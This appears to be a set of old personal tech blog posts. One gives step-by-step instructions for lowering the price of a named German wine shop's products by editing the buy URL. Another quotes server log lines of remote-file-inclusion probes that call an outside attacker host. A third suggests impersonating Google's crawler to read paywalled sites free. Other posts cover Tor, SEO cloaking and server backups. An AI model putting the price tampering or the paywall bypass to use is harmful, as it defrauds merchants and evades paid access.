The wine webshop http://www.weingut-martin.de/ is this weeks winner of my brand new Best Security Ever award.

1. Visit their site, http://www.weingut-martin.de/
2. Find something you want to order.
3. Look at the link to Kaufen (buy): (link cut here to avoid very long line):
   http://www.weingut-martin.de/warenkorb.php?cmd=new \
   &bestell=2612 \
   &name=Homburger%20Kallmuth%20Silvaner%20Kabinett%20halbtrocken \
   &preis=4.80&tip=boxbeutel
4. Notice how preis (price) is part of this link. Don’t just click Kaufen to buy, copy the url and change the &preis variable to something like 0.50 and paste that link into your browser…
5. Cheap wine!

Now, I’m not saying you should actually go ahead and do this and finalize the order (which actually works). I’m just saying that that is a great security design right there. really thought-through.

The Pakihackers started showing up in various hitlogs reciently.

Hitlog evidence

Hitlog story regarding the Pakihackers Corp. is this:

 220.232.130.49 - - [14/Aug/2007:12:00:08 -0400] “GET /2007/07/23/4/admin.php?page=http://www.pakihackers.net/echo.txt? HTTP/1.1″ 404 8269 “-” “libwww-perl/5.808″
220.232.130.49 - - [14/Aug/2007:12:00:10 -0400] “GET /admin.php?page=http://www.pakihackers.net/echo.txt? HTTP/1.1″ 404 22871 “-” “libwww-perl/5.808″
220.232.130.49 - - [14/Aug/2007:12:00:12 -0400] “GET /2007/07/23/admin.php?page=http://www.pakihackers.net/echo.txt? HTTP/1.1″ 404 8206 “-” “libwww-perl/5.808″

Bad for your server

Everything indicates that Pakihackers are very bad for you and your server(s).

130.232.220.in-addr.arpa. 10800 IN      SOA     ns1.pacific.net.hk. postmaster.pacific.net.hk

It really did not make me shocked to learn that Pakihackers are .hk based. It does look like they are doing automatic checks for some kind of WP/WPMU exploit of somekind.

Pakihackers scanning is not dangerous if you are using recient versions of WPMU (v.1.2.3 / v1.2.4). But it’s kind of annoying, because they keep on hammering these lame requires all day long. Perhaps pakihackers are bad for you if you’re using some ancient WP version, who knows.

Tor is a great traffic analysis communications system which as of now, sadly, only allows you to use IPv4 services anonymously and securely.

Xiando SIGiNT has picked up a lot of chatter about IPv6 support being added to Tor on #tor at oftc. It is strongly indicated that Tor will be able to connect to IPv6-only websites in the very near future. This means that Tor-users will be able to enjoy the world of IPv6 services securely without actually having IPv6 themselves.

This may not sound like breaking news, but oh it is, it’s very good news indeed. IPv6 has already become the dominant standard in civilized parts of the world such as Japan, and some of the sites in these countries are only available to IPv6 users. Foregin devils Tor-users who only have IPv4 may be able to experience these sites in the close future - if the chatter picked up by xiando SIGiNT is close to correct.

It’s been.. uhm.. “rumored” that some sites who require you to pay and login to read their content threat web-crowlers differently and allow them to crawl “restricted” content. Which is nice, since all you have to do to access such sites without paying is to say you’re Google.

After pretending to be Google a few days I’ve noticed something. Many websites seem to give a different page depending on who visits. For example, this is the front page at www.bluecoat.com:

Doesn’t look very fancy, does it? That is because they serve Google (and anyone/thing who pretends to be Google) a completely different page.

Their website actually looks like this - in most browsers:

This is what’s called doing black-hat “search engine optimization”.

Except for one little detail. The problem with all kinds of “dirty trick” black-hat SEO is that it doesn’t work.

And it specially doesn’t work with Google. Se, here’s a little dirty secret about GoogleBot: It sometimes lies about who’s there! It will fetch the / using the normal User-Agent, wait a while, and re-crawl the root page / using a (outdated beta-version of a Linux-only) web browser string.

I don’t actually know what Google (or more correctly, their bot..) thinks of websites who give them a different page. But I do not think their bot likes that kind of SEO. And as mentioned, it’s not like you’re fooling anyone by trying to give search-engines a different page, most of them now check at least 1 page on your site using a “fake” (as in not their own) User-Agent string.

But I actually like getting a simpler “SEO” page. It’s much simpler to find what you’re looking for using a “Web 0.1″ plain text link-list - in most cases…

Just one more little detail regarding SEO: It does not work. Forget about the SE part. Just optimize your sites for human visitors. If they like it then real people who like your site will link to your site and pages on your site, and that’s the only kind of SEO which actuall works. Period.

The main harddrive in one of our servers died a week before Christmas. It was a total crisis, and also a test of backup-routines. The crisis was that the server was unavailable until the datacenter where it is co-located could replace the harddrive, and also that the backups where stored in a place with high bandwidth in (so backups could be transferred to it quickly) and almost no bandwidth out (which means that it took quite a while to restore the backups). This - all in all - caused quite a bit of downtime because the backups had to be slowly transferred to other servers who temporarily did the job of the server with the defective harddrive, and it also put a larger load on these serves because they suddenly got a unforseen load-increase.

And by unforseen load-increase I mean that doing backups regularly is something that, luckily, was covered, but what to do with them, what server to restore them to and how was not even considered before the crisis was there.

So. If you are a CEO or just a normal IT guy in a corporation, you may want to consider:

• Do you have backup-routines who cover all important data on all servers (all data that is not programs who are included in the OS, etc)?
• Do you have routines for where this data should be restored to in order to bring backed-up services up immediately using alternative server(s)?
• Do you have alternative servers ready to run affected services if one or more servers go down?

The reason these questions come to light today is this:

“Date : 01/11/2007

Reboot is failing, BIOS is not detecting your disk but is waiting forever.

At this point I can only offer a reinstall on a new drive of the linux of your choice (I recommend CentOS 4.4 as it’s the quickest install) and slaving your old drive in hopes of some data recovery. This assumes the drive can even be hooked to the IDE bus as a slave without preventing system boot.

Please update this ticket to tell us how you wish to proceed.”

Yes. Another server stopped responding. The datacenter were asked to reboot it. They did and this is what they had to say about it. Great. Another dead harddrive. The more servers you have, the more trouble you have.

Luckily, it did not really matter much that the server died.It was one of the servers used to run the YacySearch search-engine. A index of about a million URLs and their keywords were “lost”. Well, “lost” as in it does not matter enough to make backups of or attempt to restore the data from the previous harddrive - since it is only a matter of re-crawling and re-indexing them, but still, data was lost because of no backup routines for it.

The result, in this cause, was that YacySearch is temporarily slightly slower and temporarily shows a few less search-results for a few keywords. But service downtime and losses could have been greater. So a word of advice: Check your backup-routines, and the routines for keeping your services running if a server fails..

This also applies to personal computers. Imagine this: The computer you  are currently using to read this just died. It’s harddrive is defective. Everything on it is gone forever. Does it bother you? If it does then that means you that your backup-routines are not good enough.